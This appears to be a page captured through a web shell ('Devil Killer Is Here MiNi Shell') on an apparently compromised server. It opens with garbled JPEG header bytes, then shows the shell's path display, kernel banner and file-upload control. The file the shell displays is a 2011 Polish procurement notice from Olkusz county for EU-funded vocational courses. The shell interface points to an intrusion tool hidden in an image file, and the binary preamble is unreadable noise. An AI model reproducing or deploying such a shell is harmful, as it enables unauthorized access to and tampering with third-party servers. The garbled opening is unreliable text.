JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110404/64188-N-2011.html

<p class="kh_header"><b>Olkusz: Organizacja i przeprowadzenie kursów zawodowych dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce - Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolenia zawodowego.</b><br>
<b>Numer ogłoszenia: 64188 - 2011; data zamieszczenia: 04.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Olkuszu , ul. Mickiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6430414, 6476670, faks 032 6430490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów zawodowych dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce - Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolenia zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Organizacja i przeprowadzenie kursów zawodowych dla uczestników projektu Modernizacja Kształcenia Zawodowego w Małopolsce - Program Operacyjny Kapitał Ludzki Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolenia zawodowego o następującej tematyce:
1.Część I - Carving - szkolenie grupowe
2.Część II - kurs kelnerski
3.Część III - kurs manager restauracji
4.Część IV - Warsztat baristyczny/ art-latte
5.Część V - Kurs barmański
6.Część VI- kurs kelnerski dostosowany do potrzeb młodzieży uczęszczającej do szkoły specjalnej
7.Część VII - Kurs spawacza
8.Część VIII - Bezpyłowe tynki gipsowe typu multi finisz.
Uczestnikami kursów będą uczniowie szkół zawodowych z terenu powiatu olkuskiego, będący jednocześnie uczestnikami projektu Modernizacja Kształcenia Zawodowego w Małopolsce. Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej z 8 części zamówienia wykazanych poniżej.
CZĘŚĆ I  Carving - szkolenie grupowe
I.1 Liczba uczestników - 2 grupy nie większe niż 7 osób w każdej.
I.2 Kurs Carvingu - szkolenie grupowe w wymiarze co najmniej 8 godzin.
Program kursu powinien obejmować co najmniej zagadnienia:
-historia sztuki carvingu 
-narzędzia do carvingu: typy, rodzaje, sposoby używania i konserwacji 
-sposoby zabezpieczania i pielęgnacji wyrzeźbionych prac 
-rzeźbienie takich jak: arbuz, melon, dynia, burak, kalarepa, rzodkiew, ogórek, cukinia, marchew i inne 
-tworzenie dekoracji sztuki carvingu poprzez łączenie pojedynczych rzeźb (tworzenie kompozycji przestrzennej) 
 I.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Wykonawca jest zobowiązany do zapewnienia każdemu uczestnikowi kursu kompletu noży do carvingu, które po zakończeniu kursu zostaną własnością kursanta.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy.
CZĘŚĆ II Kurs kelnerski

II.1 Liczba uczestników: 10 osób - 1 grupa.
II. 2 Kurs kelnerski w wymiarze co najmniej 32 godzin (spotkania maksymalnie 8 godzinne w weekendy lub inne dni wolne).
Program kursu powinien obejmować co najmniej zagadnienia:
1.Przygotowanie do pracy
2.Techniki kelnerskie
3.Podstawowe informacje nt. kawy i napojów kawowych, w tym obsługa ekspresu ciśnieniowego i sposoby przygotowywania
4.Pojęcie aperitif i degestif - zasady i przykłady zastosowania
5.Zasady obsługi gości
6.Napoje i alkohole - rozróżnianie i sposoby podawania ze szczególnym uwzględnieniem win (nazwy, rodzaje, umiejętność doboru do potraw, etykiety win)
7.Obsługa klienta na różnych etapach - od powitania do pożegnania

II.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy

CZĘŚĆ III - Kurs manager restauracji
III.1 Liczba uczestników: 3 osoby
III.2 Kurs manager restauracji w wymiarze co najmniej 64 godziny (spotkania maksymalnie  8 godzin dziennie w weekendy lub w dni wolne). Program kursu powinien obejmować co najmniej zagadnienia:
1.Obowiązki managera restauracji
2.Elementy zarządzania
3.Specyfika zarządzania restauracją
4.Rekrutacja pracowników
5.Organizacja pracy serwisu kelnerskiego oraz pracy w barze
6.Typologia alkoholi, miksologia, enologia
7.Obsługa konsumenta
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
W związku z niewielką liczbą uczestników kursu Zamawiający dopuszcza włączenie kursantów do grupy spoza niniejszego zamówienia.
CZĘŚĆ IV - Warsztat baristyczny/art latte
IV.1 Liczba uczestników: 2 osoby  IV.2 Kurs baristyczny z elementami art latte w wymiarze minimum 8 godzin.
Program kursu powinien obejmować co najmniej zagadnienia:
1.	Podstawy teoretyczne (zarys historyczny, odmiany kawy, regiony uprawy, sposoby przetwarzania i palenia, najważniejsze metody przyrządzania i serwowania napojów kawowych)
2.	Zajęcia praktyczne: 
-Obsługa ekspresu ciśnieniowego
-Espresso
-Kawy mleczne
-Kawy deserowe
-Art latte
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
IV.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
W związku z niewielką liczbą uczestników kursu Zamawiający dopuszcza włączenie kursantów do grupy spoza niniejszego zamówienia.
CZĘŚĆ V- Kurs barmański
V.1. Liczba uczestników - 8 osób - 1grupa
V.2 Kurs barmański w wymiarze co najmniej 32 godziny.
Program kursu powinien obejmować co najmniej:
1.Klasyfikację alkoholi
2.Naczynia i przyrządy niezbędne do pracy barmana
3.Podział alkoholi
4.Techniki przygotowywania drinków
5.Sporządzanie drinków z różnych rodzajów alkoholi
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
V.3. Metody pracy
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
CZĘŚĆ VI - Kurs kelnerski dostosowany do potrzeb uczniów kształcących się w szkole specjalnej
VI.1 Liczba uczestników: 10 osób - 1 grupa
VI. 2 Kurs kelnerski w wymiarze co najmniej 32 godzin (spotkania maksymalnie 5 godzinne w weekendy lub inne dni wolne)
Program kursu powinien obejmować co najmniej zagadnienia:
1.Przygotowanie do pracy
2.Techniki kelnerskie
3.Podstawowe informacje nt. kawy i napojów kawowych, w tym obsługa ekspresu ciśnieniowego i sposoby przygotowywania
4.Pojęcie aperitif i degestif - zasady i przykłady zastosowania
5.Zasady obsługi gości
6.Napoje i alkohole - rozróżnianie i sposoby podawania ze szczególnym uwzględnieniem win (nazwy, rodzaje, umiejętność doboru do potraw, etykiety win)
7.Obsługa klienta na różnych etapach - od powitania do pożegnania

VI.3 Metody pracy:
-zajęcia teoretyczne ograniczone do minimum
-ćwiczenia praktyczne
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć  50 minut zajęć  + 10 minut przerwy
CZĘŚĆ VII - kurs spawacza metodą MAG - 135
VII.1 Liczba uczestników - 30 osób (min 2 grupy, max.  15 osobowe)
VII.2 Kurs spawacza metodą MAG - 135 - spawanie łukowe elektrodą topliwą                     w osłonie gazu aktywnego blach i rur spoinami pachwinowymi, w wymiarze co najmniej 148 godzin
Program kursu powinien obejmować elementy:
Program kursu powinien być oparty na  programach Międzynarodowego Instytutu Spawalnictwa i Europejskiej Federacji Spawalniczej lub programach własnych Instytutu Spawalnictwa (zgodny z wytycznymi Instytutu Spawalnictwa: W-07/IS-02.) Program powinien pozwolić na podejście do egzaminu zewnętrznego.
VII.3 Metody pracy:
-zajęcia teoretyczne 
-zajęcia praktyczne - co najmniej 100 godzin.
Zamawiający wymaga pokrycia kosztów badań lekarskich dla każdego z kursantów niezbędnych przy ubieganiu się o uzyskanie stosownych uprawnień oraz pokrycia kosztów jednokrotnego egzaminu dla każdego z kursantów, po zdaniu którego uczestnicy otrzymują książeczkę spawacza, Świadectwo Egzaminu Kwalifikacyjnego Spawacza.
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć   50 minut zajęć  + 10 minut przerwy
CZĘŚĆ VIII - bezpyłowe tynki gipsowe typu multi-finish
VIII.1 Liczba uczestników - 12 osób - 1 grupa
VIII.2 Kurs bezpyłowe tynki gipsowe typu multi-finish, w wymiarze co najmniej 32 godziny
 Program kursu powinien obejmować co najmniej następujące elementy:
-Właściwości gipsu i jego zastosowanie jako materiału budowlanego
-Rodzaje płyt do systemów suchej zabudowy
-Omówienie i prezentacja podstawowych konstrukcji systemów suchej zabudowy (ściany działowe, sufity podwieszane, suchy tynk, okładziny ścian).
-Poprawność wykonawstwa konstrukcji z płyt GK (właściwy dobór materiałów, utrzymanie reżimu technologicznego, zabezpieczenie przed pęknięciami, wykonawstwo szczegółów).
-Technologie szpachlowania styków płyt GK. 
-Podstawowe wiadomości z zakresu ogniochronności elementów budowlanych.
-Poprawne wykonanie konstrukcji ogniochronnych z płyt GK i z płyty Fireboard
(warunki, zalecenia, szczegóły). 
-Naprawa usterek, eliminacja błędów wykonawczych. 
-Konstrukcje nietypowe (obudowy z płyt GK z ołowiem w pomieszczeniach RTG, sufity akustyczne, podłogi techniczne - podnoszone). 
-Przygotowanie podłoża - masy samopoziomujace i środki gruntujące
Ilekroć w opisie czasu zajęć występuje słowo godzina, należy przez to rozumieć 50 minut zajęć  + 10 minut przerwy
WYKONAWCA ZOBOWIĄZANY JEST ZAPEWNIĆ (dotyczy wszystkich części zamówienia)
-Wykonawca zapewni w trakcie trwania szkolenia warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy oraz jeżeli to konieczne odzież ochronną i sprzęt ochronny. Wykonawca musi dla każdego uczestnika kursu zagwarantować miejsce siedzące (stolik/ławkę bądź krzesło z przystawką) umożliwiające swobodne sporządzanie notatek. 
-Jeżeli kurs odbywa się w miejscu wskazanym przez Zamawiającego to Zamawiający odpowiedzialny jest za wskazanie lokalizacji zgodnej z przepisami bezpieczeństwa    i higieny pracy.
-Wykonawca w pierwszym dniu, przed rozpoczęciem kursu jest zobowiązany zapoznać uczestników z jego szczegółowym programem oraz przekazać im harmonogram realizowanych zajęć. Wykonawca zapewni każdemu uczestnikowi kursu materiały szkoleniowe na zajęcia praktyczne i teoretyczne, materiały piśmiennicze potrzebne do prowadzenia notatek (notatnik, długopis).
-Wykonawca zobowiązuje się do prowadzenia dokumentacji przebiegu kursu stanowiącej: 
-dziennik zajęć edukacyjnych zawierający wymiar godzin i tematy zajęć edukacyjnych,
-listę obecności 
-protokół z przebiegu egzaminu wewnętrznego oraz zewnętrznego, jeśli został przeprowadzony, 
-imienny wykaz osób, które ukończyły kurs, nie ukończyły kursu, nie zdały egzaminu, bądź nie przystąpiły do egzaminu,
-rejestr wydanych zaświadczeń potwierdzających ukończenie kursu i uzyskanie kwalifikacji.  
-Wykonawca zapewni w cenie kursu kawę, herbatę, wodę, susz konferencyjny, a w przypadku zajęć trwających dłużej niż 5 godzin, Wykonawca zapewni 1 gorący posiłek (catering) dla uczestników projektu. 
-Zaleca się aby kursy były przeprowadzone na terenie Gminy Olkusz, a w przypadku kursów określonych w częściach I, II na terenie Gminy Bukowno. Dopuszcza się jednak możliwość przeprowadzenia zajęć teoretycznych i praktycznych poza Gminą Olkusz (lub Bukowno), na terenie województwa małopolskiego lub województwa śląskiego, z tym że odległość z miejscowości, gdzie będą prowadzone kursy do miejscowości będącej siedzibą Zamawiającego nie może przekroczyć 50 km. W przypadku, gdy kurs odbywać się będzie poza terenem Gminy Olkusz, Wykonawca pokrywa koszty transportu uczestników, dodatkowo w przypadku grup równych bądź większych niż 10 osób odpowiada również za organizację transportu. Wyjątkiem jest kurs określony w Części VI - kurs kelnerski dla młodzieży uczęszczającej do szkoły specjalnej, gdzie wymogiem jest, aby kurs odbywał się w miejscu wskazanym przez Zamawiającego.
-Wykonawca zapewni nadzór wewnętrzny i wskaże w miejscu szkolenia osobę odpowiedzialną za obsługę szkolenia i kontaktu z uczestnikami szkolenia oraz Zamawiającym.
-Wykonawca zobowiązany jest do indywidualizacji kształcenia poprzez prowadzenie stałej oceny postępów poszczególnych uczestników szkolenia i zwiększenia pomocy wobec osób napotykających trudności w procesie nauczania.
-Przy kursach i szkoleniach tego wymagających, Wykonawca uwzględni w cenie koszt badań psychotechnicznych dla uczestników kursu, a  także opłacenie 1 egzaminu wewnętrznego oraz zewnętrznego, jeśli taki jest przewidziany, a także pozostałe koszty organizacyjne
-Wykonawca dokona ubezpieczenia NW uczestnika kursu, w przypadku gdy będzie to konieczne. 
-Kursy mają zakończyć się oceną zdobytych umiejętności oraz wydaniem imiennego certyfikatu i zaświadczenia o ukończeniu kursu zgodnie z przepisami Ministra Edukacji i Nauki (Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami). 
-Wydane certyfikaty oraz zaświadczenia muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (nie dotyczy certyfikatów   zaświadczeń, których wzory zostały określone odpowiednimi przepisami). Wykonawca przekaże Zamawiającemu kserokopie wydanych dokumentów wraz z potwierdzeniem ich odbioru do siedziby Biura ds. realizacji projektu Modernizacja Kształcenia Zawodowego w Małopolsce w Olkuszu,                w terminie 7 dni od daty ich wydania uczestnikom kursów zawodowych.
-W przypadku CZĘŚCI VII  zamówienia - kurs spawacza metodą MAG - 135, Zamawiający wymaga pokrycia kosztów badań lekarskich dla każdego z kursantów niezbędnych przy ubieganiu się o uzyskanie stosownych uprawnień oraz pokrycia kosztów jednokrotnego egzaminu dla każdego z kursantów, po zdaniu którego uczestnicy otrzymują książeczkę spawacza, Świadectwo Egzaminu Kwalifikacyjnego Spawacza.
-Zamawiający zastrzega sobie możliwość prowadzenia bieżącego nadzoru nad procesem szkolenia uczestników projektu, na każdym jego etapie wraz z udziałem w ocenach częściowych i ocenie końcowej uczestników kursu oraz kontroli frekwencji kierowanych przez Zamawiającego uczestników kursu na zajęciach. 
-Wykonawca zobowiązuje się przedstawić w siedzibie Biura ds. realizacji projektu Modernizacja Kształcenia Zawodowego w Małopolsce w Olkuszu, nie później niż do 4 dnia roboczego każdego miesiąca, uwierzytelnionych kopii list obecności uczestników zajęć za miesiąc poprzedni, potwierdzonych własnoręcznym podpisem osób skierowanych na kurs oraz podpisem osoby prowadzącej kurs.
-Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego (najpóźniej w ciągu 3 dni) o każdej nieobecności uczestnika na kursie.
-Wykonawca zawiadomi Zamawiającego o terminie i godzinie egzaminu wewnętrznego i egzaminu zewnętrznego. 
-Wykonawca niezwłocznie, tj. w ciągu 3 dni, zawiadomi (w formie pisemnej) Zamawiającego o wszelkich zmianach dotyczących prowadzonego kursu. 
-Wszystkie dokumenty dotyczące realizacji kursu będą zawierały informację o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki. 
-W pomieszczeniach, w których będą realizowane kursy będą umieszczone informacje o współfinansowaniu projektu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz aktualne logotypy, zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
-Wykonawca zobowiązuje się do przedstawienia programu kursu  oraz harmonogramu do akceptacji Zamawiającego, co najmniej 7 dni roboczych przed rozpoczęciem kursu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ oraz wykazie wykonanych usług złożonym wg załącznika nr 4. Z treści wykazu musi wynikać, że Wykonawca spełnia warunek doświadczenia dotyczący: wykonania w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 (dwóch) usług szkoleniowych, w których łączna suma przeszkolonych osób równa jest co najmniej liczbie uczestników szkoleń  objętych częściami zamówienia na które wykonawca składa ofertę. 
(np. jeśli wykonawca złoży ofertę na część I , II i V - musi wykazać się doświadczeniem wykonania w ciągu ostatnich 3 lat co najmniej dwóch usług szkoleniowych, w których łączna suma przeszkolonych osób wynosiła co najmniej 32 osoby).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ oraz w oświadczeniu potwierdzającym,  że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku dokonana zostanie zgodnie z formułą (spełnia-nie spełnia) w oparciu o informacje zawarte w oświadczeniu o spełnianiu warunków udziału w postępowaniu złożonym według załącznika nr 2a do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Atest przyznany przez Instytut Spawalnictwa, uprawniający do szkolenia i egzaminowania spawaczy (dotyczy części VII).</p>
